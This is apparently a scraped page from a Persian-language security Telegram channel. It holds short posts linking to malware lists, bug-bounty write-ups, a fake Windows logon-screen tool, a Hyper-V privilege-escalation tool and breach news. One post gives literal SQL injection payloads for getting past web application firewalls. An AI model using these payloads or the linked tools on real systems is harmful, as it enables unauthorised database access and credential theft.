امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
لیست بدافزارهای اندرویدی فعال و توضیح یک خطی در مورد نحوه فعالیت هرکدام

https://forensics.spreitzenbarth.de/android-malware/


#android
#malware


@sec_nerd
یعنی تا الان...


#shit
#fortinet

@sec_nerd
رتبه بندی کشورهای میزبان سرورهای کنترل کننده بات نت ها در سال ۲۰۱۹


(توی بیست تای اول نیستیم)


https://www.spamhaus.org/news/article/793/


#news
#botnet


@sec_nerd
Cross-Site Websocket Hijacking bug in Facebook that leads to account takeover


https://ysamm.com/?p=363


#writeup
#facebook
#bugbounty


@sec_nerd
هشت روش برای دور زدن WAF در حملات تزریق SQL

1.Nullbyte:
%00' UNION SELECT password FROM Users WHERE username-'tom'--

2. SQL Comments:
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/OM/**/Users/**/WHE/**/RE/**/usersame/**/LIKE/**/'tom'--

3. URL encoding:
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%25a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'tom'--

4. Changing Cases:
UniOn AlL SeLeCt/*inc0gbyt3*/select/**/1,2,3,4,5 --


5. HTTP Parameter Pollution (HPP):
Regular attack SQLi hxxps://www.xxx.com/noticias.php?id=1 union select 1,2 --

HPP attack + SQLi: hxxps://www.xxx.com/noticias.php?id=1&id=*/union/*&id=*/select/*&id=*/1,2+--+


6. Replacing keywords technique
hxxps://www.xxx.com/artigos.php?id=123+UnIoN+SeLselectECT+1,2,3,4,5--

7. CRLF WAF Bypass (Carriage Return, Line Feed) - Common on (aspxasp) applications
Putting theses chars at the beggining of payload

%0A%0d+select+user+from+dual+%0A%0D


8. Buffer Overflow bypassing:
and (select 1) = (select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..... A's)



https://incogbyte.github.io/sqli_waf_bypass/


#sqli
#WAF
#web
#pentest


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
صفحه ی فیک لاگین ویندوز که قابلیت ترکیب با سایر ابزارها و بدافزارهای ویندوزی را دارد

زبان سی شارپ

https://github.com/bitsadmin/fakelogonscreen


#windows
#pentest
#malware
#privesc


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
وقتی دستور git رو اشتباه تایپ میکنی

#fun
#dev

@sec_nerd
بالابردن سطح دسترسی از ادمین Hyper-v به یوزر SYSTEM در آخرین نسخه ی پچ شده ی ویندوز ۱۰

https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/


ابزار:
https://github.com/decoder-it/Hyper-V-admin-EOP/




#windows
#privesc
#hyper_v


@sec_nerd
شرکت ژاپنی NEC اعتراف کرد شبکه داخلی اش در سال ۲۰۱۶ مورد حمله ی هکرها قرار گرفته است.
آنها در سال ۲۰۱۷ متوجه ترافیک رمزنگاری شده ی مشکوکی در شبکه داخلی خود شدند که یکسال بعد توانستند آن را رمزگشایی کرده و متوجه شوند که این ترافیک بیش از ۲۷ هزار فایل را از بخش تجارت دفاعی شرکت به سرقت برده است!
با اینکه شرکت NEC دومین شرکت پیمانکار نظامی در ژاپن است که مورد حمله ی هکرها قرار میگیرد اما مسئولان این شرکت اعلام کردند که داده های سرقت شده حاوی پروژه های دفاعی یا اطلاعات شخصی کارکنان نبوده است.



https://www.zdnet.com/article/japanese-company-nec-confirms-2016-security-breach/


#breach
#news
#japan


@sec_nerd